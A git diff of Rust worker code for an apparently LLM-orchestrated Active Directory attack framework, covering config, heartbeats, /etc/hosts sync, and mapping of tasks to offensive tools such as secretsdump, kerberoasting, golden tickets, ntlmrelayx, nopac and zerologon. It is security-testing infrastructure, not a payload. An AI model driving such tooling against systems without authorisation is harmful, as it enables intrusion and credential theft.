+//! +//! Maps to the Python config module's `get_redis_url()`, `get_agent_task_timeout()`, +//! and worker-specific env vars used in `_worker.py`. + +use std::env; +use std::time::Duration; + +/// Worker execution mode. +#[derive(Debug, Clone, PartialEq, Eq)] +pub enum WorkerMode { + /// Full task execution: consume from `ares:tasks:{role}`, expand composite + /// tasks, run tools, push results. This is the default mode used when + /// Python workers or standalone Rust workers handle entire tasks. + Task, + + /// Thin tool executor: consume individual tool calls from + /// `ares:tool_exec:{role}`, dispatch via `ares_tools::dispatch()`, push + /// results to `ares:tool_results:{call_id}`. Used when the Rust + /// orchestrator drives the LLM agent loop (ARES_LLM_MODEL). + ToolExec, + + /// Blue team task execution: consume from `ares:blue:tasks:global:{role}`, + /// run the blue team LLM agent loop with HTTP-based tools (Loki, + /// Prometheus, detection queries), push results to `ares:blue:results:`. + #[cfg(feature = "blue")] + BlueTask, +} + +/// Worker configuration parsed from environment variables. +#[derive(Debug, Clone)] +pub struct WorkerConfig { + /// Redis connection URL (ARES_REDIS_URL). + pub redis_url: String, + + /// Worker role matching `AgentRole` values: credential_access, cracker, lateral, acl, privesc, coercion. + pub worker_role: String, + + /// Kubernetes pod name (HOSTNAME fallback). + pub pod_name: String, + + /// Logical agent name derived from role (e.g., "ares-lateral-agent"). + pub agent_name: String, + + /// Active operation ID, if known at startup. + pub operation_id: Option, + + /// Worker mode: "task" (default) or "tool_exec" (ARES_WORKER_MODE). + pub mode: WorkerMode, + + /// Maximum time for a single LLM agent task before kill (ARES_AGENT_TASK_TIMEOUT). + /// Default: 600 seconds. + pub task_timeout: Duration, + + /// Heartbeat interval — how often we refresh `ares:heartbeat:{agent}`. + /// Default: 15 seconds. + pub heartbeat_interval: Duration, + + /// Heartbeat TTL in Redis. Must be > heartbeat_interval. + /// Default: 60 seconds (matches Python's HEARTBEAT_TTL). + pub heartbeat_ttl: Duration, + + /// BLPOP timeout for polling the task queue. + /// Default: 5 seconds (matches Python's poll_task default). + pub poll_timeout: Duration, +} + +impl WorkerConfig { + /// Parse configuration from environment variables. + /// + /// Required: + /// - `ARES_REDIS_URL` — Redis connection string + /// - `ARES_WORKER_ROLE` — Worker role (credential_access, cracker, lateral, acl, privesc, coercion) + /// + /// Optional: + /// - `ARES_POD_NAME` / `HOSTNAME` — Pod name (default: "unknown") + /// - `ARES_OPERATION_ID` — Active operation ID + /// - `ARES_WORKER_MODE` — "task" (default) or "tool_exec" + /// - `ARES_AGENT_TASK_TIMEOUT` — Task timeout in seconds (default: 600) + /// - `ARES_HEARTBEAT_INTERVAL` — Heartbeat interval in seconds (default: 15) + /// - `ARES_HEARTBEAT_TTL` — Heartbeat TTL in seconds (default: 60) + /// - `ARES_POLL_TIMEOUT` — BLPOP timeout in seconds (default: 5) + pub fn from_env() -> anyhow::Result { + let redis_url = env::var("ARES_REDIS_URL") + .map_err(|_| anyhow::anyhow!("ARES_REDIS_URL is required"))?; + + let worker_role = env::var("ARES_WORKER_ROLE") + .map_err(|_| anyhow::anyhow!("ARES_WORKER_ROLE is required"))?; + + let pod_name = env::var("ARES_POD_NAME") + .or_else(|_| env::var("HOSTNAME")) + .unwrap_or_else(|_| "unknown".to_string()); + + let agent_name = format!("ares-{}-agent", worker_role.replace('_', "-")); + + let operation_id = env::var("ARES_OPERATION_ID").ok(); + + let mode = match env::var("ARES_WORKER_MODE").as_deref() { + Ok("tool_exec") => WorkerMode::ToolExec, + #[cfg(feature = "blue")] + Ok("blue_task") => WorkerMode::BlueTask, + _ => WorkerMode::Task, + }; + + let task_timeout = Duration::from_secs( + env::var("ARES_AGENT_TASK_TIMEOUT") + .ok() + .and_then(|v| v.parse::().ok()) + .unwrap_or(600), + ); + + let heartbeat_interval = Duration::from_secs( + env::var("ARES_HEARTBEAT_INTERVAL") + .ok() + .and_then(|v| v.parse::().ok()) + .unwrap_or(15), + ); + + let heartbeat_ttl = Duration::from_secs( + env::var("ARES_HEARTBEAT_TTL") + .ok() + .and_then(|v| v.parse::().ok()) + .unwrap_or(60), + ); + + let poll_timeout = Duration::from_secs( + env::var("ARES_POLL_TIMEOUT") + .ok() + .and_then(|v| v.parse::().ok()) + .unwrap_or(5), + ); + + Ok(Self { + redis_url, + worker_role, + pod_name, + agent_name, + operation_id, + mode, + task_timeout, + heartbeat_interval, + heartbeat_ttl, + poll_timeout, + }) + } +} + +#[cfg(test)] +mod tests { + use super::*; + + /// Combined test to avoid env var race conditions between parallel tests. + #[test] + fn from_env_all_scenarios() { + // Missing redis URL fails + std::env::remove_var("ARES_REDIS_URL"); + std::env::set_var("ARES_WORKER_ROLE", "recon"); + assert!(WorkerConfig::from_env().is_err()); + + // Missing role fails + std::env::set_var("ARES_REDIS_URL", "redis://localhost"); + std::env::remove_var("ARES_WORKER_ROLE"); + assert!(WorkerConfig::from_env().is_err()); + + // Defaults applied + std::env::set_var("ARES_WORKER_ROLE", "recon"); + std::env::remove_var("ARES_WORKER_MODE"); + let c = WorkerConfig::from_env().unwrap(); + assert_eq!(c.task_timeout, Duration::from_secs(600)); + assert_eq!(c.heartbeat_interval, Duration::from_secs(15)); + assert_eq!(c.heartbeat_ttl, Duration::from_secs(60)); + assert_eq!(c.poll_timeout, Duration::from_secs(5)); + assert!(c.operation_id.is_none()); + assert_eq!(c.mode, WorkerMode::Task); + + // Worker mode: tool_exec + std::env::set_var("ARES_WORKER_MODE", "tool_exec"); + let c = WorkerConfig::from_env().unwrap(); + assert_eq!(c.mode, WorkerMode::ToolExec); + + // Worker mode: blue_task + #[cfg(feature = "blue")] + { + std::env::set_var("ARES_WORKER_MODE", "blue_task"); + let c = WorkerConfig::from_env().unwrap(); + assert_eq!(c.mode, WorkerMode::BlueTask); + std::env::remove_var("ARES_WORKER_MODE"); + } + + // Agent name from role + std::env::set_var("ARES_WORKER_ROLE", "credential_access"); + let c = WorkerConfig::from_env().unwrap(); + assert_eq!(c.agent_name, "ares-credential-access-agent"); + assert_eq!(c.worker_role, "credential_access"); + + std::env::remove_var("ARES_REDIS_URL"); + std::env::remove_var("ARES_WORKER_ROLE"); + } +} diff --git a/ares-cli/src/worker/heartbeat.rs b/ares-cli/src/worker/heartbeat.rs new file mode 100644 index 00000000..cc3cf1e9 --- /dev/null +++ b/ares-cli/src/worker/heartbeat.rs @@ -0,0 +1,155 @@ +//! Background heartbeat task. +//! +//! Spawns a tokio task that periodically writes to `ares:heartbeat:{agent_name}` +//! with a TTL, matching the Python `_threaded_heartbeat_loop` in `_worker.py`. +//! +//! The heartbeat runs independently of the GIL-bound task loop, ensuring the +//! orchestrator always knows the worker is alive even during long Python calls. + +use std::sync::Arc; +use std::time::Duration; + +use chrono::Utc; +use redis::AsyncCommands; +use tokio::sync::watch; +use tokio::task::JoinHandle; +use tracing::{debug, warn}; + +/// Heartbeat key prefix — matches `RedisTaskQueue.HEARTBEAT_PREFIX` in Python. +const HEARTBEAT_PREFIX: &str = "ares:heartbeat"; + +/// Current worker status, shared between the task loop and heartbeat task. +#[derive(Debug, Clone)] +pub struct WorkerStatus { + /// "idle" or "busy" + pub status: String, + /// Current task ID if busy, None if idle. + pub current_task: Option, +} + +impl Default for WorkerStatus { + fn default() -> Self { + Self { + status: "idle".to_string(), + current_task: None, + } + } +} + +/// Handle to the background heartbeat task. Drop to stop. +pub struct HeartbeatHandle { + _handle: JoinHandle<()>, +} + +/// Spawn the background heartbeat loop. +/// +/// Returns a `HeartbeatHandle` (drop it or abort to stop) and a `watch::Sender` +/// the task loop uses to update current status. +#[allow(clippy::too_many_arguments)] +pub fn spawn_heartbeat( + conn: redis::aio::ConnectionManager, + agent_name: String, + pod_name: String, + role: String, + operation_id: Option, + interval: Duration, + ttl: Duration, + shutdown: Arc, +) -> (HeartbeatHandle, watch::Sender) { + let (status_tx, status_rx) = watch::channel(WorkerStatus::default()); + + let handle = tokio::spawn(heartbeat_loop( + conn, + agent_name, + pod_name, + role, + operation_id, + interval, + ttl, + status_rx, + shutdown, + )); + + (HeartbeatHandle { _handle: handle }, status_tx) +} + +#[allow(clippy::too_many_arguments)] +async fn heartbeat_loop( + mut conn: redis::aio::ConnectionManager, + agent_name: String, + pod_name: String, + role: String, + operation_id: Option, + interval: Duration, + ttl: Duration, + status_rx: watch::Receiver, + shutdown: Arc, +) { + let heartbeat_key = format!("{HEARTBEAT_PREFIX}:{agent_name}"); + let ttl_secs = ttl.as_secs() as i64; + + debug!("Heartbeat: writing to {heartbeat_key} every {interval:?}"); + + let mut ticker = tokio::time::interval(interval); + ticker.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = ticker.tick() => {} + _ = shutdown.notified() => { + // Send a final "offline" heartbeat before exiting + let data = build_heartbeat_json("offline", None, &pod_name, &role, &operation_id); + let _: Result<(), _> = redis::cmd("SET") + .arg(&heartbeat_key) + .arg(&data) + .arg("EX") + .arg(ttl_secs) + .query_async(&mut conn) + .await; + debug!("Heartbeat: shutdown, sent offline heartbeat"); + return; + } + } + + let status = status_rx.borrow().clone(); + let data = build_heartbeat_json( + &status.status, + status.current_task.as_deref(), + &pod_name, + &role, + &operation_id, + ); + + match conn + .set_ex::<_, _, ()>(&heartbeat_key, &data, ttl_secs as u64) + .await + { + Ok(()) => { + debug!("Heartbeat: {agent_name} -> {}", status.status); + } + Err(e) => { + // ConnectionManager auto-reconnects on next use + warn!("Heartbeat: Redis write failed: {e}"); + } + } + } +} + +/// Build the heartbeat JSON payload matching Python's `send_heartbeat`. +fn build_heartbeat_json( + status: &str, + current_task: Option<&str>, + pod_name: &str, + role: &str, + operation_id: &Option, +) -> String { + serde_json::json!({ + "status": status, + "current_task": current_task, + "pod_name": pod_name, + "role": role, + "operation_id": operation_id, + "timestamp": Utc::now().to_rfc3339(), + }) + .to_string() +} diff --git a/ares-cli/src/worker/hosts.rs b/ares-cli/src/worker/hosts.rs new file mode 100644 index 00000000..c021f2ed --- /dev/null +++ b/ares-cli/src/worker/hosts.rs @@ -0,0 +1,238 @@ +//! Background `/etc/hosts` management for AD hostname resolution. +//! +//! In Active Directory environments, Kerberos authentication requires hostname +//! resolution. Workers need to resolve DC names and other AD hosts. This module +//! periodically reads discovered hosts from Redis and appends new entries to +//! `/etc/hosts`. +//! +//! For domain controllers, the bare domain name is also added as an alias to +//! enable Kerberos realm resolution (e.g., `192.168.58.10 dc01.contoso.local dc01 contoso.local`). + +use std::collections::HashSet; +use std::sync::Arc; +use std::time::Duration; + +use redis::aio::ConnectionManager; +use redis::AsyncCommands; +use tracing::{debug, info, warn}; + +use ares_core::models::Host; + +/// Interval between host sync cycles. +const SYNC_INTERVAL: Duration = Duration::from_secs(30); + +/// Build the `/etc/hosts` entries for a list of discovered hosts. +/// +/// Returns `(entries, new_written_ips)` — the formatted lines and which IPs +/// were included (for dedup tracking). +pub fn build_host_entries(hosts: &[Host], already_written: &HashSet) -> Vec { + let mut entries = Vec::new(); + + for host in hosts { + if host.ip.is_empty() || host.hostname.is_empty() { + continue; + } + if already_written.contains(&host.ip) { + continue; + } + + let hostname = host.hostname.to_lowercase(); + let parts: Vec<&str> = hostname.split('.').collect(); + let short_name = parts.first().copied().unwrap_or(&hostname); + + // Build aliases: FQDN, short name, and bare domain for DCs + let mut aliases = vec![hostname.clone()]; + if short_name != hostname { + aliases.push(short_name.to_string()); + } + + // For domain controllers, add bare domain for Kerberos realm resolution + if host.is_dc && parts.len() >= 2 { + let domain = parts[1..].join("."); + if !domain.is_empty() { + aliases.push(domain); + } + } + + entries.push(format!("{} {}", host.ip, aliases.join(" "))); + } + + entries +} + +/// Write new host entries to `/etc/hosts`. +/// +/// Appends entries in a single write to minimize race conditions. +/// Returns the set of IPs that were successfully written. +fn write_etc_hosts(entries: &[String], agent_name: &str) -> HashSet { + use std::io::Write; + + let mut written = HashSet::new(); + + if entries.is_empty() { + return written; + } + + match std::fs::OpenOptions::new().append(true).open("/etc/hosts") { + Ok(mut f) => { + let mut buf = format!("\n# Ares discovered hosts ({agent_name})\n"); + for entry in entries { + buf.push_str(entry); + buf.push('\n'); + // Extract IP from "IP hostname ..." format + if let Some(ip) = entry.split_whitespace().next() { + written.insert(ip.to_string()); + } + } + if let Err(e) = f.write_all(buf.as_bytes()) { + warn!("Cannot write to /etc/hosts: {e}"); + return HashSet::new(); + } + info!( + count = entries.len(), + agent = agent_name, + "Updated /etc/hosts" + ); + for entry in entries { + debug!("Added hosts entry: {entry}"); + } + } + Err(e) => { + warn!("Cannot open /etc/hosts for append: {e}"); + } + } + + written +} + +/// Spawn a background task that periodically syncs hosts from Redis to `/etc/hosts`. +/// +/// Requires an operation ID to know which Redis key to read from. +/// Returns the join handle. +pub fn spawn_hosts_sync( + conn: ConnectionManager, + operation_id: String, + agent_name: String, + shutdown: Arc, +) -> tokio::task::JoinHandle<()> { + tokio::spawn(async move { + let mut conn = conn; + let mut written_ips: HashSet = HashSet::new(); + + let hosts_key = format!("ares:op:{operation_id}:hosts"); + info!(key = %hosts_key, "Starting /etc/hosts sync background task"); + + loop { + tokio::select! { + _ = tokio::time::sleep(SYNC_INTERVAL) => {} + _ = shutdown.notified() => { + debug!("hosts_sync: shutdown signalled"); + return; + } + } + + // Read hosts from Redis + let hosts_json: Vec = match conn.lrange(&hosts_key, 0, -1).await { + Ok(h) => h, + Err(e) => { + debug!("hosts_sync: Redis read failed: {e}"); + continue; + } + }; + + let hosts: Vec = hosts_json + .iter() + .filter_map(|json| serde_json::from_str(json).ok()) + .collect(); + + let entries = build_host_entries(&hosts, &written_ips); + if !entries.is_empty() { + let newly_written = write_etc_hosts(&entries, &agent_name); + written_ips.extend(newly_written); + } + } + }) +} + +// ─── Tests ────────────────────────────────────────────────────────────────── + +#[cfg(test)] +mod tests { + use super::*; + + fn make_host(ip: &str, hostname: &str, is_dc: bool) -> Host { + Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc, + owned: false, + } + } + + #[test] + fn test_build_host_entries_basic() { + let hosts = vec![ + make_host("192.168.58.10", "dc01.contoso.local", true), + make_host("192.168.58.22", "ws01.contoso.local", false), + ]; + let entries = build_host_entries(&hosts, &HashSet::new()); + assert_eq!(entries.len(), 2); + // DC entry should have FQDN, short name, and domain + assert_eq!( + entries[0], + "192.168.58.10 dc01.contoso.local dc01 contoso.local" + ); + // Non-DC entry should have FQDN and short name only + assert_eq!(entries[1], "192.168.58.22 ws01.contoso.local ws01"); + } + + #[test] + fn test_build_host_entries_dedup() { + let hosts = vec![make_host("192.168.58.10", "dc01.contoso.local", true)]; + let mut already_written = HashSet::new(); + already_written.insert("192.168.58.10".to_string()); + let entries = build_host_entries(&hosts, &already_written); + assert!(entries.is_empty()); // Already written + } + + #[test] + fn test_build_host_entries_skip_incomplete() { + let hosts = vec![ + make_host("", "dc01.contoso.local", true), + make_host("192.168.58.10", "", true), + ]; + let entries = build_host_entries(&hosts, &HashSet::new()); + assert!(entries.is_empty()); // Both missing required fields + } + + #[test] + fn test_build_host_entries_short_hostname() { + let hosts = vec![make_host("192.168.58.99", "fileserver", false)]; + let entries = build_host_entries(&hosts, &HashSet::new()); + assert_eq!(entries.len(), 1); + // Short hostname without domain — no alias needed + assert_eq!(entries[0], "192.168.58.99 fileserver"); + } + + #[test] + fn test_build_host_entries_dc_subdomain() { + let hosts = vec![make_host("192.168.58.15", "dc02.north.contoso.local", true)]; + let entries = build_host_entries(&hosts, &HashSet::new()); + assert_eq!(entries.len(), 1); + assert_eq!( + entries[0], + "192.168.58.15 dc02.north.contoso.local dc02 north.contoso.local" + ); + } + + #[test] + fn test_build_host_entries_lowercase() { + let hosts = vec![make_host("192.168.58.10", "DC01.CONTOSO.LOCAL", true)]; + let entries = build_host_entries(&hosts, &HashSet::new()); + assert_eq!(entries.len(), 1); + assert!(entries[0].contains("dc01.contoso.local")); // Lowercased + } +} diff --git a/ares-cli/src/worker/mod.rs b/ares-cli/src/worker/mod.rs new file mode 100644 index 00000000..8495a445 --- /dev/null +++ b/ares-cli/src/worker/mod.rs @@ -0,0 +1,156 @@ +//! Ares Worker — task consumption loop. +//! +//! 1. BLPOP from Redis queue (`ares:tasks:{role}`) +//! 2. Execute agent tasks (native Rust tool execution) +//! 3. Push results back (`ares:results:{task_id}`) + +#[cfg(feature = "blue")] +mod blue_task_loop; +mod config; +mod heartbeat; +mod hosts; +mod task_loop; +mod tool_check; +mod tool_executor; + +use std::sync::Arc; + +use tracing::{error, info}; + +pub async fn run() -> anyhow::Result<()> { + // Initialize telemetry (console + OTLP when endpoint is configured) + let _telemetry = ares_core::telemetry::init_telemetry( + ares_core::telemetry::TelemetryConfig::new("ares-worker"), + ); + + // Parse config from environment + let config = config::WorkerConfig::from_env()?; + let mode_str = match config.mode { + config::WorkerMode::Task => "task", + config::WorkerMode::ToolExec => "tool_exec", + #[cfg(feature = "blue")] + config::WorkerMode::BlueTask => "blue_task", + }; + info!( + agent = %config.agent_name, + role = %config.worker_role, + mode = mode_str, + pod = %config.pod_name, + operation_id = ?config.operation_id, + task_timeout_secs = config.task_timeout.as_secs(), + "Ares worker starting" + ); + + // Single shared Redis connection — cloned cheaply to all subsystems + // Default response_timeout is 500ms which is too short for BRPOP + // blocking calls (5s+). Without this, the client-side timeout cancels + // the future but the server-side BRPOP remains, consuming queue items + // that get silently dropped. + let redis_client = redis::Client::open(config.redis_url.as_str())?; + let cm_config = redis::aio::ConnectionManagerConfig::new() + .set_response_timeout(Some(std::time::Duration::from_secs(30))); + let conn = redis_client + .get_connection_manager_with_config(cm_config) + .await?; + + // Shared shutdown signal + let shutdown = Arc::new(tokio::sync::Notify::new()); + let shutdown_signal = Arc::clone(&shutdown); + + // Spawn background heartbeat + let (_heartbeat_handle, status_tx) = heartbeat::spawn_heartbeat( + conn.clone(), + config.agent_name.clone(), + config.pod_name.clone(), + config.worker_role.clone(), + config.operation_id.clone(), + config.heartbeat_interval, + config.heartbeat_ttl, + Arc::clone(&shutdown), + ); + + // Check tool availability for this role and publish inventory + let inventory = tool_check::check_tools(&config.worker_role).await; + tool_check::publish_inventory(&mut conn.clone(), &config.agent_name, &inventory).await; + + // Spawn /etc/hosts sync if we have an operation ID + let _hosts_handle = config.operation_id.as_ref().map(|op_id| { + hosts::spawn_hosts_sync( + conn.clone(), + op_id.clone(), + config.agent_name.clone(), + Arc::clone(&shutdown), + ) + }); + + // Spawn SIGTERM/SIGINT handler + let shutdown_for_signal = Arc::clone(&shutdown_signal); + tokio::spawn(async move { + wait_for_shutdown_signal().await; + info!("Shutdown signal received, draining..."); + shutdown_for_signal.notify_waiters(); + }); + + // Run the appropriate loop based on worker mode + let result = match config.mode { + config::WorkerMode::Task => { + task_loop::run_task_loop(&config, conn, status_tx, shutdown_signal).await + } + config::WorkerMode::ToolExec => { + tool_executor::run_tool_exec_loop(&config, conn, status_tx, shutdown_signal).await + } + #[cfg(feature = "blue")] + config::WorkerMode::BlueTask => { + // Blue team mode requires an LLM provider + let model_spec = std::env::var("ARES_LLM_MODEL") + .unwrap_or_else(|_| "anthropic/claude-sonnet-4-20250514".to_string()); + let (provider, model_name) = match ares_llm::create_provider(&model_spec) { + Ok(p) => p, + Err(e) => { + error!("Failed to create LLM provider for blue worker: {e}"); + return Err(e); + } + }; + let dispatcher = std::sync::Arc::new(blue_task_loop::BlueLocalToolDispatcher::new()); + info!(model = %model_name, "Blue team worker using LLM"); + blue_task_loop::run_blue_task_loop( + &config, + conn, + provider, + dispatcher, + model_name, + status_tx, + shutdown_signal, + ) + .await + } + }; + + match &result { + Ok(()) => info!("Ares worker shut down cleanly"), + Err(e) => error!("Ares worker exited with error: {e}"), + } + + result +} + +/// Wait for SIGTERM or SIGINT (Ctrl-C). +async fn wait_for_shutdown_signal() { + #[cfg(unix)] + { + use tokio::signal::unix::{signal, SignalKind}; + let mut sigterm = signal(SignalKind::terminate()).expect("failed to register SIGTERM"); + let mut sigint = signal(SignalKind::interrupt()).expect("failed to register SIGINT"); + tokio::select! { + _ = sigterm.recv() => info!("Received SIGTERM"), + _ = sigint.recv() => info!("Received SIGINT"), + } + } + #[cfg(not(unix))] + { + tokio::signal::ctrl_c() + .await + .expect("failed to register Ctrl-C handler"); + info!("Received Ctrl-C"); + } +} diff --git a/ares-cli/src/worker/task_loop/executor.rs b/ares-cli/src/worker/task_loop/executor.rs new file mode 100644 index 00000000..c70ef0c5 --- /dev/null +++ b/ares-cli/src/worker/task_loop/executor.rs @@ -0,0 +1,415 @@ +//! Task execution — run_agent_task dispatches to ares-tools. +//! +//! The orchestrator submits high-level composite task types (e.g. "recon", +//! "credential_access") with a `technique`/`techniques` field in the payload. +//! This module expands those into individual tool calls that `ares_tools::dispatch` +//! understands, then parses the raw output into structured discoveries. + +use std::time::Duration; + +use serde_json::Value; +use tracing::{info, warn}; + +use super::types::AgentResult; + +/// Execute a tool natively in Rust via ares-tools. +/// +/// First attempts direct dispatch by `task_type`. If the task type is a +/// composite type (recon, credential_access, etc.), expands it into individual +/// tool calls based on the `technique`/`techniques` payload field. +/// +/// Tool outputs are parsed to extract structured discoveries (hosts, +/// credentials, hashes, vulnerabilities) that the orchestrator can consume. +pub async fn run_agent_task( + task_type: &str, + params: &serde_json::Value, + _timeout: Duration, +) -> anyhow::Result { + // Try expanding composite task types first + let tools = expand_task(task_type, params); + + if tools.is_empty() { + // Direct tool dispatch (task_type IS the tool name) + info!(tool = task_type, "Executing tool natively"); + let output = ares_tools::dispatch(task_type, params).await?; + let raw = output.combined_raw(); + let discoveries = ares_tools::parsers::parse_tool_output(task_type, &raw, params); + return Ok(make_result_with_discoveries(output, discoveries)); + } + + // Run each expanded tool, collecting outputs and discoveries + let mut outputs = Vec::new(); + let mut all_discoveries = Vec::new(); + let mut any_error = false; + + for (tool_name, tool_params) in &tools { + info!(tool = %tool_name, parent_task = task_type, "Executing expanded tool"); + match ares_tools::dispatch(tool_name, tool_params).await { + Ok(output) => { + if !output.success { + any_error = true; + } + let raw = output.combined_raw(); + let combined = output.combined(); + let disc = ares_tools::parsers::parse_tool_output(tool_name, &raw, tool_params); + all_discoveries.push(disc); + outputs.push(format!("=== {} ===\n{}", tool_name, combined)); + } + Err(e) => { + warn!(tool = %tool_name, err = %e, "Expanded tool failed"); + any_error = true; + outputs.push(format!("=== {} ===\nERROR: {}", tool_name, e)); + } + } + } + + let combined = outputs.join("\n\n"); + let discoveries = ares_tools::parsers::merge_discoveries(&all_discoveries); + let error = if any_error { + Some("one or more tools had errors".to_string()) + } else { + None + }; + + Ok(AgentResult { + output: combined, + error, + usage: None, + discoveries: Some(discoveries), + }) +} + +fn make_result_with_discoveries(output: ares_tools::ToolOutput, discoveries: Value) -> AgentResult { + let combined = output.combined(); + let error = if output.success { + None + } else { + Some(format!("tool exited with code {:?}", output.exit_code)) + }; + AgentResult { + output: combined, + error, + usage: None, + discoveries: if discoveries.as_object().is_none_or(|o| o.is_empty()) { + None + } else { + Some(discoveries) + }, + } +} + +/// Expand a composite task type into individual (tool_name, params) pairs. +/// +/// Returns an empty vec if the task_type is already a concrete tool name. +fn expand_task(task_type: &str, params: &serde_json::Value) -> Vec<(String, serde_json::Value)> { + match task_type { + "recon" | "credential_access" | "privesc_enumeration" | "lateral_movement" | "coercion" => { + expand_technique_task(params) + } + "crack" => expand_crack_task(params), + "exploit" => expand_exploit_task(params), + // Already a concrete tool name — handled by direct dispatch + _ => Vec::new(), + } +} + +/// Expand tasks that have `technique` (singular) or `techniques` (array) fields. +fn expand_technique_task(params: &serde_json::Value) -> Vec<(String, serde_json::Value)> { + let mut tools = Vec::new(); + let normalized = normalize_params(params); + + // Handle singular "technique" field + if let Some(technique) = params.get("technique").and_then(|v| v.as_str()) { + let tool_name = map_technique_to_tool(technique); + tools.push((tool_name, normalized.clone())); + return tools; + } + + // Handle "techniques" array + if let Some(techniques) = params.get("techniques").and_then(|v| v.as_array()) { + for tech in techniques { + if let Some(name) = tech.as_str() { + let tool_name = map_technique_to_tool(name); + tools.push((tool_name, normalized.clone())); + } + } + } + + tools +} + +/// Normalize orchestrator payload field names to what ares-tools expects. +/// +/// The orchestrator sends `target_ip` but tools expect `target`. +/// Credential objects are flattened into top-level fields. +fn normalize_params(params: &serde_json::Value) -> serde_json::Value { + let mut p = params.clone(); + if let Some(obj) = p.as_object_mut() { + // target_ip → target (tools expect "target") + if !obj.contains_key("target") { + if let Some(ip) = obj.get("target_ip").cloned() { + obj.insert("target".to_string(), ip); + } + } + // Also set "targets" for tools that want it (smb_sweep) + if !obj.contains_key("targets") { + if let Some(ip) = obj.get("target_ip").cloned() { + obj.insert("targets".to_string(), ip); + } + } + // Flatten credential object into top-level fields + if let Some(cred) = obj.get("credential").cloned() { + if let Some(cred_obj) = cred.as_object() { + for (k, v) in cred_obj { + if !obj.contains_key(k) { + obj.insert(k.clone(), v.clone()); + } + } + } + } + } + p +} + +/// Map technique names (from orchestrator payloads) to ares-tools dispatch names. +fn map_technique_to_tool(technique: &str) -> String { + match technique { + // Recon technique → tool mappings + "network_scan" => "nmap_scan".to_string(), + "user_enumeration" => "enumerate_users".to_string(), + "share_enumeration" => "enumerate_shares".to_string(), + "smb_enumeration" => "smb_sweep".to_string(), + "bloodhound_collect" => "run_bloodhound".to_string(), + "trust_enumeration" => "enumerate_domain_trusts".to_string(), + + // Credential access technique → tool mappings + "share_spider" => "smbclient_spider".to_string(), + "asrep_roast" | "asrep" => "asrep_roast".to_string(), + + // Most technique names already match tool names 1:1 + other => other.to_string(), + } +} + +/// Expand crack tasks to the appropriate cracking tool. +fn expand_crack_task(params: &serde_json::Value) -> Vec<(String, serde_json::Value)> { + let normalized = normalize_params(params); + let tool = if params + .get("use_john") + .and_then(|v| v.as_bool()) + .unwrap_or(false) + { + "crack_with_john" + } else { + "crack_with_hashcat" + }; + vec![(tool.to_string(), normalized)] +} + +/// Expand exploit tasks based on vuln_type. +fn expand_exploit_task(params: &serde_json::Value) -> Vec<(String, serde_json::Value)> { + let vuln_type = params + .get("vuln_type") + .and_then(|v| v.as_str()) + .unwrap_or(""); + + let tool = match vuln_type { + "constrained_delegation" | "unconstrained_delegation" => "s4u_attack", + "esc1" | "adcs_esc1" => "certipy_request", + "esc4" | "adcs_esc4" => "certipy_esc4_full_chain", + "esc8" | "adcs_esc8" => "ntlmrelayx_to_adcs", + "krbtgt_hash" => "generate_golden_ticket", + "rbcd" => "rbcd_write", + "nopac" | "samaccountname" => "nopac", + "printnightmare" => "printnightmare", + "zerologon" => "zerologon_check", + "krbrelayup" => "krbrelayup", + "mssql_access" => "mssql_enum_impersonation", + _ => { + warn!(vuln_type, "No tool mapping for exploit vuln_type"); + return Vec::new(); + } + }; + + vec![(tool.to_string(), normalize_params(params))] +} + +#[cfg(test)] +mod tests { + use super::*; + use serde_json::json; + + // --- normalize_params --- + + #[test] + fn test_normalize_params_target_ip_to_target() { + let params = json!({"target_ip": "192.168.58.10"}); + let norm = normalize_params(¶ms); + assert_eq!(norm["target"], "192.168.58.10"); + assert_eq!(norm["targets"], "192.168.58.10"); + // Original field preserved + assert_eq!(norm["target_ip"], "192.168.58.10"); + } + + #[test] + fn test_normalize_params_existing_target_not_overwritten() { + let params = json!({"target": "192.168.58.10", "target_ip": "192.168.58.20"}); + let norm = normalize_params(¶ms); + assert_eq!(norm["target"], "192.168.58.10"); // not overwritten + } + + #[test] + fn test_normalize_params_credential_flattening() { + let params = json!({ + "target_ip": "192.168.58.10", + "credential": { + "username": "admin", + "password": "P@ss1", + "domain": "contoso.local" + } + }); + let norm = normalize_params(¶ms); + assert_eq!(norm["username"], "admin"); + assert_eq!(norm["password"], "P@ss1"); + assert_eq!(norm["domain"], "contoso.local"); + } + + #[test] + fn test_normalize_params_existing_fields_not_overwritten_by_cred() { + let params = json!({ + "domain": "fabrikam.local", + "credential": { + "domain": "contoso.local", + "username": "admin", + "password": "pass" + } + }); + let norm = normalize_params(¶ms); + assert_eq!(norm["domain"], "fabrikam.local"); // not overwritten + } + + // --- map_technique_to_tool --- + + #[test] + fn test_map_technique_to_tool_mapped() { + assert_eq!(map_technique_to_tool("network_scan"), "nmap_scan"); + assert_eq!(map_technique_to_tool("user_enumeration"), "enumerate_users"); + assert_eq!( + map_technique_to_tool("share_enumeration"), + "enumerate_shares" + ); + assert_eq!(map_technique_to_tool("smb_enumeration"), "smb_sweep"); + assert_eq!( + map_technique_to_tool("bloodhound_collect"), + "run_bloodhound" + ); + assert_eq!( + map_technique_to_tool("trust_enumeration"), + "enumerate_domain_trusts" + ); + assert_eq!(map_technique_to_tool("share_spider"), "smbclient_spider"); + assert_eq!(map_technique_to_tool("asrep_roast"), "asrep_roast"); + assert_eq!(map_technique_to_tool("asrep"), "asrep_roast"); + } + + #[test] + fn test_map_technique_to_tool_passthrough() { + assert_eq!(map_technique_to_tool("nmap_scan"), "nmap_scan"); + assert_eq!(map_technique_to_tool("secretsdump"), "secretsdump"); + assert_eq!(map_technique_to_tool("kerberoast"), "kerberoast"); + } + + // --- expand_task --- + + #[test] + fn test_expand_task_recon_with_techniques() { + let params = json!({"techniques": ["network_scan", "user_enumeration"], "target_ip": "192.168.58.10"}); + let tools = expand_task("recon", ¶ms); + assert_eq!(tools.len(), 2); + assert_eq!(tools[0].0, "nmap_scan"); + assert_eq!(tools[1].0, "enumerate_users"); + // Params should be normalized + assert_eq!(tools[0].1["target"], "192.168.58.10"); + } + + #[test] + fn test_expand_task_credential_access_single_technique() { + let params = json!({"technique": "secretsdump", "target_ip": "192.168.58.10"}); + let tools = expand_task("credential_access", ¶ms); + assert_eq!(tools.len(), 1); + assert_eq!(tools[0].0, "secretsdump"); + } + + #[test] + fn test_expand_task_concrete_tool_returns_empty() { + let params = json!({"target": "192.168.58.10"}); + let tools = expand_task("nmap_scan", 